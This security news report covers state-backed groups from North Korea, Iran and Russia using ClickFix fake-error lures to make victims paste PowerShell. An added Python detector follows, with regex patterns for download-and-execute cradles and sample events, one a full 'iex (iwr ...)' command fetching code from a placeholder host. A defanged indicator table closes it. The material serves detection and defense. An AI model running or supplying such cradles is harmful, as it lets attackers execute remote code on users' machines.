Security researchers have observed multiple state-sponsored hacking groups across North Korea, Iran, and Russia incorporating the ClickFix social engineering technique into their espionage operations between late 2024 and early 2025.
Originally associated with cybercriminals, ClickFix is now being adopted by advanced persistent threat (APT) actors, demonstrating the fluidity and cross-pollination of tactics in the global threat landscape.
ClickFix, which first emerged in cybercrime circles in March 2024, leverages deceptive dialogue boxes and authoritative error messages to trick users into manually executing malicious commands, typically PowerShell, on their machines.
The method often presents fake system problems and demands users “fix” the issue by copying and pasting attacker-supplied commands, thus bypassing common automated defenses.
North Korean Campaigns
North Korea-based threat actor TA427 (overlapping with Kimsuky/Emerald Sleet) was observed implementing ClickFix as a pivotal infection chain stage earlier this year.
Attackers initiated contact by posing as diplomatic personnel, sending benign emails to individuals involved in North Korean policy.
Once trust was established, a follow-up message provided a PDF with a malicious link, directing targets to a spoofed secure drive hosting further instructions.

The infection process required victims to manually execute PowerShell commands that fetched and executed multi-stage scripts, ultimately deploying the QuasarRAT backdoor.
The infrastructure supporting these campaigns, mainly hosted on compromised South Korean servers and dynamic DNS domains, exhibited multilingual content and sophisticated social engineering.
Iranian Espionage with RMM Tools
In November 2024, Iran-affiliated TA450 (also known as MuddyWater/Mango Sandstorm) utilized ClickFix to target at least 39 organizations, mostly in the Middle East.
Posing as Microsoft security alerts, the attackers instructed recipients to run PowerShell with administrative privileges, then execute a supplied command.
According to the report, this command installed the legitimate remote management tool “Level,” which was then abused for espionage and exfiltration.
This marked the first recorded instance of TA450 using Level, though they have previously leveraged other RMM tools (Atera, ScreenConnect, etc.).
The campaign displayed a notable expansion in targeting scope beyond their typical focus on Israel.
Russian APTs have also experimented with ClickFix. In December 2024, UNK_RemoteRogue exploited compromised Zimbra mail servers to deliver emails with links masquerading as Microsoft Office portals.
Users were prompted to run attacker-supplied code, which executed PowerShell scripts tied to the Empire C2 framework.
Similar infrastructure was re-used in later phishing campaigns involving RDP delivery.
In another instance, TA422 (Sofacy/APT28) used Google Sheets lures that triggered reCAPTCHA events, instructing victims to run PowerShell that established SSH tunnels for remote control via Metasploit.
While ClickFix does not fundamentally transform the tradecraft of these state-backed actors, its integration demonstrates a trend where espionage groups quickly adapt cybercriminal techniques to evade detection and streamline initial compromise.
Notably, most observed groups reverted to traditional methods after their initial ClickFix campaigns, suggesting ongoing experimentation and operational trialling.
However, evidence points to recurring iterations by actors like TA427, indicating ongoing investment in refining this manual exploitation technique.
Despite the lack of persistent use, the cross-regional adoption of ClickFix underscores the necessity for organizations to enhance user awareness and technical controls against manual execution-based social engineering attacks.
As cybercriminal and espionage TTPs continue to converge, defenders must remain vigilant for new campaign variants leveraging similar social engineering methods.
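Every campaign above ends the same way: a user pastes a PowerShell download-and-execute command into a Run box or console, sometimes as administrator. The following is an added detection example, not code from the report or from any vendor product; it scores Sysmon-style process-creation events, and the field names, weights, threshold and sample events are all constructed assumptions.

```python
"""Flag ClickFix-style hand-pasted PowerShell launches in process-creation logs."""
import re
from dataclasses import dataclass, field
from typing import Optional

# Parents of a shell the user opened by hand: Win+R and the Start menu spawn
# children under explorer.exe, a manually opened console under WindowsTerminal.
INTERACTIVE_PARENTS = {"explorer.exe", "windowsterminal.exe"}
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}

# Fragments typical of "fetch a remote stage and run it in memory" cradles.
CRADLE_PATTERNS = {
    "remote_fetch": re.compile(r"invoke-webrequest|\biwr\b|\birm\b|downloadstring|net\.webclient", re.I),
    "in_memory_exec": re.compile(r"\biex\b|invoke-expression", re.I),
    "encoded_command": re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "hidden_window": re.compile(r"-w(indowstyle)?\s+hidden|-nop\b|-noprofile", re.I),
}

@dataclass
class Finding:
    score: int
    reasons: list = field(default_factory=list)

def score_event(event: dict) -> Optional[Finding]:
    """Return a Finding for a PowerShell launch that looks hand-pasted, else None.
    `event` mimics a Sysmon Event ID 1 record (assumed field names, not a real schema)."""
    image = event["Image"].rsplit("\\", 1)[-1].lower()
    if image not in POWERSHELL_IMAGES:
        return None
    finding = Finding(score=0)
    parent = event.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
    if parent in INTERACTIVE_PARENTS:
        finding.score += 2
        finding.reasons.append(f"interactive parent {parent}")
    for name, pat in CRADLE_PATTERNS.items():
        if pat.search(event.get("CommandLine", "")):
            finding.score += 2
            finding.reasons.append(name)
    if event.get("IntegrityLevel", "").lower() == "high":  # "run as administrator" shells
        finding.score += 1
        finding.reasons.append("high integrity")
    return finding if finding.score >= 4 else None  # threshold is an assumption

def triage(events):
    return [(e["CommandLine"], f) for e in events if (f := score_event(e))]

SAMPLE_EVENTS = [  # constructed events; placeholder host, not a real indicator
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell -w hidden -c "iex (iwr https://securedrive.example/docs/t.vmd -UseBasicParsing)"', "IntegrityLevel": "Medium"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"powershell.exe -NoProfile -File C:\Scripts\inventory.ps1", "IntegrityLevel": "System"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell -ExecutionPolicy Bypass -EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA", "IntegrityLevel": "High"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": '"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"', "IntegrityLevel": "Medium"},
]
```

Only the two pasted cradles score; the scheduled script under svchost.exe and the plain interactive shell fall below the threshold.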
Indicators of Compromise (IoCs)
Indicator | Type | Description | First Seen |
---|---|---|---|
yasuyuki.ebata21@proton[.]me | Email | TA427 sender email | Feb 2025 |
eunsoolim29@gmail[.]com | Email | TA427 sender email | Jan 2025 |
38.180.157[.]197 | IP | QuasarRAT C2 | Jan 2025 |
office[.]rsvp | Domain | Delivery/Phishing infrastructure | Dec 2024 |
mail.ukrtelecom[.]eu | Domain | Phishing infrastructure | Jan 2025 |
ukrtelecom[.]eu | Domain | Phishing infrastructure | Jan 2025 |
support@microsoftonlines[.]com | Email | TA450 sender email | Nov 2024 |
microsoftonlines[.]com | Domain | TA450 phishing infrastructure | Nov 2024 |
securedrive.fin-tech[.]com/docs/en/t.vmd | URL | PowerShell payload hosting | Jan 2025 |
hxxps://office[.]rsvp/fin?document=2hg6739jh… | URL | UNK_RemoteRogue lures | Dec 2024 |
80.66.66[.]197 | IP | UNK_RemoteRogue email delivery | Dec 2024 |
freedrive.servehttp[.]com | Domain | Payload delivery | Mar 2025 |
raedom[.]store | Domain | C2 | Jan 2025 |
06816634fb019b6ed276d36f414f3b36f99b845ddd10… | SHA256 | Lure PDF (TA427) | Jan 2025 |
0ff9c4bba39d6f363b9efdfa6b54127925b8c606ecef… | SHA256 | Stager VBS script (TA427) | Jan 2025 |
85db55aab78103f7c2d536ce79e923c5fd9af14a2683… | SHA256 | QuasarRAT (TA427) | Jan 2025 |